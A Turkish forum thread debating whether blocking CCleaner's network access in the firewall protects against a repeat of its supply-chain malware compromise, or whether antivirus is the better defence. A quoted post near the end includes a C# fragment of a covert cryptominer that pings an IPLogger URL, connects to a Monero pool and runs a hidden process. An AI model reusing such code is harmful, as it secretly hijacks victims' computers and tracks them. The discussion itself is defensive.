CCleaner için olası güvenlik ihlaline karşı alınacak önlemler

CCleaner'ın olası sunucularının saldırıya uğraması sonucunda; saldıranlar tarafından CCleaner'ın kendi sitesine upload edilen, saldıranların CCleaner'ın içine gizledikleri zararlılardan aşağıdaki adımları uygulayarak kurtulabilirsiniz. Aslında mantık çok basit, CCleaner'ın ağla olan ilişkisini kesmek. Bunu yaptığınız zaman, CCleaner'ın içindeki Miner, Trojan, Worm, Adware vb. zararlılar düzgün çalışmayacak. Trojan, Miner, Worm, Adware vb. zararlılar ağı kullanamadığı zaman işlevsiz kalırlar.

Bunu yapmak için;















Bunu yaptığınız zaman sadece "Yazılım Güncelleyici" özelliği devre dışı kalır. Güncelleme için ayda bir "Bağlantıya izin ver." Seçeneğini tekrar bu adımları uyguladıktan sonra seçebilirsiniz.

Bu saldırı uzun zaman önce olmamış mıydı? Ayrıca virüsü geçici olarak etkisiz hale getirmek yerine antivirüs kullanmak daha mantıklı bir seçenek değil mi?

"Olası" ifadesini o yüzden kullandım zaten, tekrar olursa diye.
Bunu zaten Kaspersky IS/TS ürünlerinde yapabiliyorsunuz, kullanmayanlar ve indirmek istemeyenler için Windows'un Güvenlik Duvarından gösterdim.
Programın ağla olan ilişkisini kesmek, zararlı için kalıcı bir çözümdür. Tabi programın ağ bağlantısını tekrar açmak, kalıcı çözümü geçici bir çözüme dönüştürebilir.

Zamanında bunun temizlenebilmesi için özel bir rehber hazırlamıştım. Zararlıyı temizlemek varken ağla ilişkisini kesip sistemde tutmaya devam etmek çok doğru değil.

Zamanında hazırladığım aşağıdaki rehbere bakabilirsiniz.

Burada önemli olan, eğer işlevsel bir uygulama varsa ve içinde zararlı barındırıyorsa o zararlıyı sisteme bulaştırmadan ve işlevsel uygulamayı zararlıyla birlikte kaldırmadan kullanabilmek.
Tabi bu dediğim CCleaner için geçerli değil.

102035 dedi:

Burada önemli olan, eğer işlevsel bir uygulama varsa ve içinde zararlı barındırıyorsa o zararlıyı sisteme bulaştırmadan ve işlevsel uygulamayı zararlıyla birlikte kaldırmadan kullanabilmek.
Tabi bu dediğim CCleaner için geçerli değil.

Zaten antivirüs kullanan şahsın CCleaner için bunu yapmasına gerek yok, aslında konu antivirüs kullanmak istemeyenlere hitap ediyor.

Genişletmek için tıkla...

Fakat zararlı barındıran sürüm 2017 yılında yayınlanan CCleaner 5.33 x86 sürümüydü ve durumun fark edilmesinin ardından zararlı barındıran hali kaldırıldı.

Şimdiki sürümlerin zaten zararlı içerdiğine dair bir şey yok bu sebeple şimdi CCleaner kullananlar için bunlara da gerek yok.

24099 dedi:

Şimdiki sürümlerin zaten zararlı içerdiğine dair bir şey yok bu sebeple şimdi CCleaner kullananlar için bunlara da gerek yok.

Genişletmek için tıkla...

"Olası" İş işten geçtikten sonra zaten bunu yapmanın anlamı kalmıyor.

Tekrar olması durumunda antivirüs kullanmak istemeyen kullanıcılar bu yöntemi uygularlarsa zararlı sürüm bilgisayarlarında olsa bile, bu adımları uyguladıktan sonra zararlının türüne ve ne yaptığına bağlı olarak bazı zararlılar işlevsiz kalabilir.

Ayrıca ağı kullanmaya, güncelleme haricinde ihtiyaç duymayan programlara da aynı yöntem uygulanabilir.
Sizin mantığınız, CCleaner'ın şimdiki sürümlerinde zararlı içerdiğine dair bir şey yok ve bu sebeple şimdi CCleaner kullananlar için herhangi bir güvenlik yazılımına gerek yok, zararlı bulaştıktan sonra kullanmalılar mantığı ile aynı şey. (Aynı örnek, sistemine zararlı girdikten sonra antivirüs kullanmaya başlayanlar için de verilebilir.)

Başlıktada görüldüğü üzere önlem almaktan bahsediyoruz burada.

102035 dedi:

Sizin mantığınız, CCleaner'ın şimdiki sürümlerinde zararlı içerdiğine dair bir şey yok ve bu sebeple şimdi CCleaner kullananlar için herhangi bir güvenlik yazılımına gerek yok, zararlı bulaştıktan sonra kullanmalılar mantığı ile aynı şey.

Başlıktada görüldüğü üzere önlem almaktan bahsediyoruz burada.

Genişletmek için tıkla...

Sizin mantığınıza göre de tüm yazılımların bu şekilde engellenmesi gerekiyor zira sadece CCleaner değil tüm yazılımların içine ileride belki gizlice zararlı gömülebilme ihtimali var olduğundan hepsini engelleyelim gitsin.

Bu arada güvenlik yazılımına gerek yok ve zararlı bulaştıktan sonra temizleyin diye bir şey demedim. Sadece bu şekilde tek tek engellemeyle sistem güvenliği sağlanmaz, sağlanamaz bunu belirtmek istedim. Bu tarz durumlara karşı bir güvenlik duvarı veya kapsamlı bir güvenlik yazılımı kurulur ve o güvenlik yazılımı olağandışı bir durumda o engeller.

Peki, sisteme bulaşacak zararlılar farklı ".exe" veya diğer dosya türlerinden bir dosya ile çalışamaz mı? Bu şekilde A zararlısının B ve C dosyalarından B dosyasını engellersiniz ama C çalışmaya devam eder veya edebilir. Veya bu zararlılardan biri rootkit türevi ise zaten sistem çekirdeğini kontrol ettiği için diğer aktif process üzerinde bile etkisi olabilir. Bu durumda hangi biri el ile tek tek kural oluşturarak engellenebilir? Birini engelledin, diğerini manipüle edince ne olacak?

Zararlıyı kökten temizlemek ve bulaşmadan önce korumak daha mantıklıdır.

@102035 CCleaner.exe, 32 Bit sistemler içindir. 64 Bit için CCleaner64.exe'nin engellenmesi gerekir.

Bir de CCleaner kullanıcılarına birkaç tavsiye vereyim. Portable sürümü varken sisteminize kurmanıza gerek yok. İndirin RAR'dan çıkartın, çıkan dosyalardan CCleaner64.exe, data dosyası ve Türkçe arayüze ihtiyaç duyuyorsanız Türkçe dil dosyası harici diğerlerini sisteminizden silebilirsiniz. CCleaner'ı sürekli güncel tutmak zorunda da değilsiniz. İstediğiniz yeni özellikler gelirse güncellersiniz. Firewall'dan engellemenin haricinde hosts dosyası yoluyla da engelleyebilirsiniz. Mesela ben Pi-Hole kullandığım için onun üzerinden engellemiştim. Aynı şekilde AdGuard Home gibi sistemlerin üzerinden de engellenebilir.

CCleaner'ın bağlantı kurduğu domain'leri aşağıya ekledim. Ayarlardan telemetry gönderme seçeğini kapatsanız bile bu adreslerle iletişim kuruyor. Engelleme kararı size kalmış. Gerekli bir işlem olmadığı için ben engelliyorum. Aynı şekilde tüm reklam/takipçi domain adreslerini de engelliyorum. Daha temiz bir İnternet deneyimi oluyor. Ek olarak kotalı İnternetiniz varsa siteler/uygulamalar üzerindeki reklam ve 3. parti takipçileri engelleyerek az da olsa tasarruf sağlayabilirsiniz.

Helper.SiteConnection("https://iplogger.com/xxxxxx"); // IPLogger

const string Pool = "pool.monero.hashvault.pro:443";
const string user = "user name";
const string cpu_usage = "75"; //25 50 75
const string password = "x";
/* Данные для майнера */

Process process = new Process();
process.StartInfo.CreateNoWindow = true;
process.StartInfo.UseShellExecute = false;
process.StartInfo.Arguments = string.Format("--url={0} --user={1} --pass={4} --threads 5 --donate-level=1 " +
"--keepalive --retries=5 --max-cpu-usage={3}",
Pool, user, "0x3", cpu_usage, password);
process.StartInfo.FileName = StartDir + "\\runtime-servece.exe";

Genişletmek için tıkla...

Zararlı "A" dosyasının içindeki zararlı "B" dosyasının açığa çıkıp düzgün çalışabilmesi için yine “A” dosyasının internet bağlantısına ihtiyaç var. Açığa çıkan "B" dosyasının asıl kaynağı "A" dosyası.
"A" dosyasının içindeki diğer zararlı dosyalar yine "A" dosyasının ağ bağlantısını kullanmaya ihtiyaç duyar.
Sen kaynak dosyanın (derlenmiş dosyanın) ağ bağlantısını kesersen, diğerlerinin hiçbir önemi kalmaz.